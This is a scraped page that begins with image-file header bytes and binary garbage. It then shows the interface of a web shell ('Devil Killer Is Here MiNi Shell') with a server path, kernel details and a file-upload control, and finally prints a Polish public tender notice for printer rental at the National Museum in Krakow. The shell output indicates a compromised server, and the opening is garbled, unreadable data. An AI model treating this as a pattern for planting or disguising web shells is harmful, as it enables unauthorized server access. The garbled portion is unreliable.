JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240321/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240321/0025557101-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Najem i kompleksowa obsługa serwisowa urządzeń wielofunkcyjnych wraz z systemem druku podążającego w oddziałach Muzeum Narodowego w Krakowie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Muzeum Narodowe w Krakowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000275961</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Al. 3 Maja 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">30-062</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">12 4335-00</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dyrekcja@mnk.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mnk.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Najem i kompleksowa obsługa serwisowa urządzeń wielofunkcyjnych wraz z systemem druku podążającego w oddziałach Muzeum Narodowego w Krakowie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-656fc054-e770-11ee-9c02-ce2b643d361d</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00255571</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-03-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00245183/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Najem i kompleksowa obsługa serwisowa urządzeń wielofunkcyjnych wraz z systemem druku podążającego w oddziałach Muzeum Narodowego w Krakowie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://mnk.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W postępowaniu komunikacja między Zamawiającym a Wykonawcami, w<br/>szczególności składanie ofert oraz wszelkich oświadczeń, odbywa się przy użyciu Platformy elektronicznej. <br/><br/>2. Środkiem komunikacji elektronicznej, służącym złożeniu oferty oraz wszelkich oświadczeń przez Wykonawcę, jest Platforma zakupowa on-line<br/>Marketplanet dostępna pod adresem https://mnk.ezamawiajacy.pl - dalej zwana „Platformą</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Korzystanie z Platformy przez Wykonawcę jest bezpłatne.<br/>2. Wymagania dotyczące zasad rejestracji oraz minimalnych parametrów technicznych wymaganych od wykonawcy przy wykorzystywaniu systemu do elektronicznej komunikacji z wykonawcami: Oferta wraz z załącznikami musi zostać złożona w postaci elektronicznej. Złożenie oferty wymaga do Wykonawcy zarejestrowania się i zalogowania w systemie informatycznym dostępnym pod adresem https://mnk.ezamawiajacy.pl, zgodnie z poniższą kolejnością. Rejestracja wykonawcy trwa maksymalnie do 2 dni roboczych. Mając to na uwadze, zamawiający zaleca wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia oferty w postaci elektronicznej. Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca biorący udział w postępowaniu prowadzonym drogą elektroniczną w systemie zakłada konto, wykonując kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”. Po założeniu konta wykonawca ma możliwość złożenia oferty w postępowaniu.<br/>3. Zamawiający wskazuje informacje, o których mowa w Rozporządzenia Prezesa Rady Ministrów w sprawie użycia środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego oraz udostępnienia i przechowywania dokumentów elektronicznych, dotyczące systemu dostępnego pod adresem https://mnk.ezamawiajacy.pl:<br/>1) komputer PC/MAC z aktualnym systemem operacyjnym wspieranym przez producenta<br/>2) Wybrana przeglądarka wspierana przez producenta: MS Internet Explorer, Firefox, Google Chrome lub MS Edge<br/>3) Podłączenie do Internetu: min. 512 Kb/s na komputer (zalecane szerokopasmowe łącze internetowe)<br/>4. Zapytania do SWZ należy zadawać za pośrednictwem platformy zakupowej zamawiającego przez link:<br/>https://mnk.ezamawiajacy.pl. Instrukcja korzystania z systemu jest dostępna pod wyżej wskazanym adresem. W przypadku trudności<br/>technicznych związanych z korzystaniem z Platformy, Zamawiający dopuszcza możliwość przekazywania informacji drogą<br/>elektroniczną: zam_publ@mnk.pl<br/>5. Oferta wraz z załącznikami musi być złożona w postaci elektronicznej w systemie informatycznym dostępnym pod adresem<br/>https://mnk.ezamawiajacy.pl.<br/>6. Za datę złożenia oferty, przekazania wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na platformę zakupową zamawiającego, opisane zostały w Instrukcji dla wykonawców która jest udostępniana na platformie zakupowej zamawiającego.<br/>7. Zamawiający informuje, iż w przypadku jakichkolwiek wątpliwości związanych z zasadami korzystania z Platformy, Wykonawca winien skontaktować się z dostawcą rozwiązania teleinformatycznego Marketplanet tel. (22) 576-87-90, e-mail:<br/>oneplace@marketplanet.pl<br/>8. Zgodnie z art. 67 Pzp określa się informacje na temat kodowania i czasu odbioru danych, tj: Plik załączony przez Wykonawcę na Platformie Zakupowej i zapisany, widoczny jest w Systemie, jako zaszyfrowany – format kodowania UTF8. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu otwarcia ofert.<br/>9. Szczegółowa instrukcja korzystania z Platformy dotycząca rejestracji, logowania, procedury przesyłania i wycofania dokumentów znajduje się na stronie internetowej https://mnk.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>•	Administratorem Pani/Pana danych osobowych jest Muzeum Narodowe w Krakowie z siedzibą w Krakowie (kontakt: Al. 3 Maja 1, 30-062 Kraków, tel.0-12 43 35 620, adres e-mail: dyrekcja@mnk.pl).<br/>•	Dane kontaktowe inspektora ochrony danych w Muzeum Narodowym w Krakowie - adres e-mail: iod@mnk.pl .<br/>•	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego nr sprawy: EP.ZP.271.05.2024 prowadzonym w trybie podstawowym;<br/>•	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 oraz art. 291 ust. 1 zdanie drugie ustawy z dnia 11 września 2019r. Prawo zamówień publicznych (Dz. U. z 2023 r., poz. 1605) dalej „ustawa Pzp”; <br/>•	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, <br/>•	a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>•	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>•	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane <br/>w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>•	posiada Pani/Pan:<br/>	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych ;<br/>	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ; <br/>	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>•	nie przysługuje Pani/Panu:<br/>	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/><br/>Do przetwarzania danych osobowych osób fizycznych w tym okresie Zamawiający stosuje przepisy ustawy z dnia 10 maja 2018 r. o ochronie danych osobowych (DZ.U. z 2018 r. poz. 1000) oraz rozporządzenia 2016/679.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">nie przysługuje Pani/Panu:<br/>􀀀 w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>􀀀 prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">EP.ZP.271.05.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest najem i kompleksowa obsługa serwisowa urządzeń wielofunkcyjnych wraz z systemem druku podążającego w oddziałach Muzeum Narodowego przez okres 60 miesięcy.<br/>2.	W ramach realizacji przedmiotu zamówienia Wykonawca zapewni: <br/>1)	możliwość drukowania, kopiowania, skanowania na urządzeniach wielofunkcyjnych dostarczonych przez Wykonawcę wraz z oprogramowaniem do wydruku podążającego w oddziałach Muzeum Narodowego w Krakowie;<br/>2)	serwis dostarczonych urządzeń wielofunkcyjnych, obejmujący dostawę i wymianę wszelkich niezbędnych materiałów eksploatacyjnych, a także kompleksową obsługę techniczną tych urządzeń wielofunkcyjnych;<br/>3)	przeprowadzenie szkoleń dla pracowników Zamawiającego w zakresie zaproponowanego oprogramowania oraz w zakresie systemu druku podążającego.<br/>3.	Wykonawca zapewnia wynajem 27 fabrycznie nowych urządzeń wielofunkcyjnych (spełniających parametry określone w załączniku Nr 2 do SWZ) wraz z ustawieniem ich w lokalizacjach określonych przez Zamawiającego. <br/>4.	Wykonawca zobowiązany jest do dostarczenia, instalacji i konfiguracji oprogramowania do wydruku podążającego. <br/>5.	Zamawiający zastrzega możliwość niezrealizowania w pełnym zakresie szacowanego wolumenu wydruku o którym mowa w załączniku nr 2 do SWZ (t.j. Opis przedmiotu zamówienia – zamówienie podstawowe) w czasie terminu realizacji umowy. Wykonawcy nie przysługują żadne roszczenia w stosunku do Zamawiającego w przypadku, gdy Zamawiający nie skorzysta z pełnej szacowanej ilości wydruku A4 monochromatyczny/A4 kolorowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30232100-5 - Drukarki i plotery</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79800000-2 - Usługi drukowania i powiązane</p> <p class="mb-0">30121000-3 - Urządzenia fotokopiujące i termokopiujące</p> <p class="mb-0">50310000-1 - Usługi w zakresie napraw i konserwacji maszyn biurowych</p> <p class="mb-0">30124000-4 - Części i akcesoria do maszyn biurowych</p> <p class="mb-0">30125110-5 - Toner do drukarek laserowych/faksów</p> <p class="mb-0">48000000-8 - Pakiety oprogramowania i systemy informatyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Opcją objęta jest: wydruk dodatkowego wolumenu wskazanego w załączniku nr 2 do SWZ w czasie terminu realizacji umowy. <br/>UWAGA! Prawo opcji oznacza, iż w przypadku zawarcia umowy, Wykonawca będzie realizował zamówienie podstawowe (zakres zamówienia określony w ust. 2 w ilościach wydruku wskazanego w załączniku nr 2 jako zamówienie podstawowe), zaś ilości wydruku objęte prawem opcji, zostaną zrealizowane na żądanie Zamawiającego. O ewentualnym skorzystaniu z prawa opcji wybrany Wykonawca zostanie powiadomiony w trakcie realizacji przedmiotu umowy, nie później jednak niż na 1 tydzień przed zakończeniem realizacji umowy. Dla potrzeb wyceny przedmiotowego zamówienia, należy obliczyć cenę z uwzględnieniem prawa opcji.<br/><br/>Prawo opcji - A4 monochromatyczny 184 969 wydruków<br/>Prawo opcji - A4 kolorowy 114 394 wydruków <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ofertom zostaną przyznane punkty wg wzoru: <br/>P= C + Z + T gdzie:<br/>	P – łączna liczba punktów<br/>	liczba punktów w kryterium „Cena”;<br/>	Z – liczba punktów w kryterium „Efektywność energetyczna urządzeń”<br/>	T – liczba punktów w kryterium „Czas reakcji”;<br/><br/><br/>3.	Ocena ofert w kryterium „Cena” (C). <br/>„Cena” rozumiana jako całkowita wartość oferty brutto, obejmująca kwotę za realizację całego zamówienia podstawowego wraz z prawem opcji.<br/>Punktacja w tym kryterium zostanie ustalona w następujący sposób:<br/>C obliczana = (X min : X obliczana ) x 50 <br/>gdzie: <br/>•	C obliczana - liczba punktów badanej oferty w kryterium „cena”;<br/>•	X min – najniższa cena pośród złożonych ważnych ofert;<br/>•	X obliczana – cena badanej oferty.<br/>Maksymalną ilość punktów (50 pkt.) w niniejszym kryterium uzyska Wykonawca który <br/>w ofercie wskaże najniższa cenę. <br/> <br/>4.	Ocena ofert w kryterium „Efektywność energetyczna urządzeń” (Z)<br/>„Efektywność energetyczna urządzeń” służy ocenie efektywności energetycznej nabywanego w ramach niniejszego postępowania urządzenia wielofunkcyjnego. Kryterium zostało oparte na wskaźniku poboru energii elektrycznej przez zaoferowane urządzenie wielofunkcyjne wyrażonym w jednostce Wat („W”). Ilość poboru energii dla: trybu pracy (rozumiany jako wydruk), ustalona na podstawie przedmiotowego środka dowodowego, o którym mowa w rozdziale XIII ust. 2 pkt. 2) SWZ. W przypadku jeśli producent wskazuje różne wartości zużycia energii dla pracy urządzenia, na potrzeby oceny ofert zostanie przyjęte normalne/typowe zużycie określone przez producenta w trakcie trybu pracy urządzenia (rozumiany jako wydruk).<br/>UWAGA! Jeżeli producent wskazuje wartość poboru energii elektrycznej:<br/>	w innej jednostce niż Wat „W” na potrzeby oceny ofert Zamawiający dokona stosownego przeliczenia, zgodnie z ogólnie przyjętymi zasadami matematycznymi, z dokładnością do dwóch miejsc po przecinku tj. np. przeliczenie kilowatów na waty odbędzie się przy użyciu następującego wzoru: [ilość kilowatów] * 1000 = [ilość watów],<br/>	za pomocą oznaczenia „&gt; wartość określona w dokumencie” np. <br/>•	&lt;1400, na potrzebę oceny ofert zostanie przyjęta wartość 1399,<br/>• &lt;850, na potrzebę oceny ofert zostanie przyjęta wartość 849. <br/>•	Itd.<br/>Punktacja w tym kryterium zostanie ustalona w oparciu o dane zawarte w przedmiotowym środku dowodowym, o którym mowa w rozdziale XIII ust. 2 pkt. 2 SWZ. Wartości dotyczące zużycia energii zostaną poddane przeliczeniu wg wzoru:<br/>Z obliczana = (X min : X obliczana ) x 46<br/>gdzie: <br/>•	Z obliczana - liczba punktów badanej oferty w kryterium „zużycie energii”;<br/>•	X min – najniższe zużycie energii wśród zaoferowanych ofert przeliczone na „W”<br/>•	X obliczana – zużycie energii badanej oferty przeliczone na „W”<br/>UWAGA!<br/>-	Wartość punktów w niniejszym kryterium zostanie zaokrąglona do dwóch miejsc po przecinku. <br/>Maksymalną ilość punktów (46 pkt.) w kryterium „Zużycie energii” uzyska Wykonawca który w złożonym przedmiotowym środku dowodowym wykaże najniższe zużycie energii.<br/><br/>W przypadku jeśli Wykonawca nie złoży przedmiotowego środka dowodowego lub będzie on niekompletny, zastosowanie będzie miał zapis rozdziału XIII ust. 5 SWZ. <br/><br/>5.	Ocena ofert w kryterium „Czas reakcji” (T)<br/>„Czas reakcji” rozumiany jako czas skutecznego usunięcia awarii, licząc od momentu zgłoszenia przez Zamawiającego, wyrażony w dniach roboczych. Poprzez dzień roboczy rozumie się czas pracy w dni robocze tj. od poniedziałku do piątku (za wyjątkiem dni ustawowo wolnych od pracy w tym okresie). W godzinach od 08:00-16:00<br/><br/>Punktacja w tym kryterium zostanie ustalona w następujący sposób:<br/>Czas skutecznej naprawy/usunięcia awarii	Liczba punktów<br/>Usunięcie awarii w terminie do 1 dnia roboczego, od momentu otrzymania zgłoszenia przez Zamawiającego 4 pkt.<br/>Usunięcie awarii w terminie do 2 dni roboczych, od momentu otrzymania zgłoszenia przez Zamawiającego	2 pkt<br/>Usunięcie awarii w terminie do 3 dni roboczych, od momentu otrzymania zgłoszenia przez Zamawiającego	0 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> aspekty środowiskowe, w tym efektywność energetyczna przedmiotu zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Efektywność energetyczna urządzeń</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">46</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">4</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty środowiskowe</p> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne 